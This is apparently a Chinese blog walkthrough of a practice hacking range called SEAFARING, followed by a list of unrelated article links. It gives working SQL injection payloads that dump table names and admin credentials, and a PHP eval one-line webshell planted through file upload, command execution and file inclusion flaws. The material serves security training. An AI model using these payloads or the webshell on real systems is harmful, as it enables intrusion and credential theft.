当前位置: 首页 > news >正文

SEAFARING靶场漏洞攻略

news 来源:原创 2024/9/20 4:26:59

寻找漏洞

一,我们打开页面

第一个漏洞

xss漏洞

1.在登录页面显示有弹窗

第二个漏洞

sql注入漏洞

1.在输入框的地方输入-1 union select 1,2,3#我们来查看他的回显点

2.查看数据库表名

-1 union select 1,database(),3#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin中的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看账号密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

6.成功登录进来

第三个漏洞

文件上传漏洞

1.我们登录进去往下滑有个上传文件我们上传一个1.php

<?php @eval($_POST['cmd']);?>

2.用蚁剑连接一下

第四个漏洞

命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问1.php

echo '<?php @eval($_POST['cmd']);?>' > 1.php

4.蚁剑连接

第五个漏洞

文件包含漏洞

1.在关于页面中发现存在文件包含漏洞

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.访问1.php

4.蚁剑连接

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • STM32中的计时与延时
  • 多旅行商问题:鹈鹕优化算法(Pelican Optimization Algorithm,POA)求解多仓库多旅行商问题MD-MTSP(提供Matlab代码)
  • 1. 如何在Java中连接MySQL数据库?请解释使用JDBC连接的步骤。
  • 模拟+分类讨论,LeetCode 2332. 坐上公交的最晚时间
  • 前后端分离Vue美容店会员信息管理系统o7grs
  • Kubernetes中pod版本回滚相关的命令?
  • ant-design表格自动合并相同内容的单元格
  • 路由原理介绍
  • Springboot错误日志切面,找到post请求体被消费后的数据
  • Unity-Transform类-缩放和看向
  • CTFHub技能树-信息泄露-HG泄漏
  • linux-硬件与设备管理-硬件信息查看
  • 信息安全工程师(6)网络信息安全现状与问题
  • TI AM62X Secure Boot 流程简述
  • Python计算机视觉第十章-OpenCV
  • 0基础学习移动端适配
  • Codepen 每日精选(2018-3-25)
  • JAVA并发编程--1.基础概念
  • Leetcode 27 Remove Element
  • swift基础之_对象 实例方法 对象方法。
  • 创建一个Struts2项目maven 方式
  • 干货 | 以太坊Mist负责人教你建立无服务器应用
  • 关于Flux,Vuex,Redux的思考
  • 基于 Ueditor 的现代化编辑器 Neditor 1.5.4 发布
  • 基于游标的分页接口实现
  • 区块链共识机制优缺点对比都是什么
  • 微信公众号开发小记——5.python微信红包
  • 问:在指定的JSON数据中(最外层是数组)根据指定条件拿到匹配到的结果
  • 我的业余项目总结
  • 云大使推广中的常见热门问题
  • 再次简单明了总结flex布局,一看就懂...
  • 好程序员大数据教程Hadoop全分布安装(非HA)
  • "无招胜有招"nbsp;史上最全的互…
  • # Swust 12th acm 邀请赛# [ E ] 01 String [题解]
  • #数学建模# 线性规划问题的Matlab求解
  • #微信小程序(布局、渲染层基础知识)
  • (2024.6.23)最新版MAVEN的安装和配置教程(超详细)
  • (附源码)spring boot球鞋文化交流论坛 毕业设计 141436
  • (微服务实战)预付卡平台支付交易系统卡充值业务流程设计
  • (已解决)报错:Could not load the Qt platform plugin “xcb“
  • (游戏设计草稿) 《外卖员模拟器》 (3D 科幻 角色扮演 开放世界 AI VR)
  • (转)IOS中获取各种文件的目录路径的方法
  • (轉貼) 2008 Altera 亞洲創新大賽 台灣學生成果傲視全球 [照片花絮] (SOC) (News)
  • (自用)仿写程序
  • .NET Conf 2023 回顾 – 庆祝社区、创新和 .NET 8 的发布
  • .net core 6 集成 elasticsearch 并 使用分词器
  • .net websocket 获取http登录的用户_如何解密浏览器的登录密码?获取浏览器内用户信息?...
  • .net 写了一个支持重试、熔断和超时策略的 HttpClient 实例池
  • .Net 转战 Android 4.4 日常笔记(4)--按钮事件和国际化
  • .NET6实现破解Modbus poll点表配置文件
  • .NetCore实践篇:分布式监控Zipkin持久化之殇
  • .net安装_还在用第三方安装.NET?Win10自带.NET3.5安装
  • .net反编译的九款神器
  • .Net开发笔记(二十)创建一个需要授权的第三方组件
  • .net中应用SQL缓存(实例使用)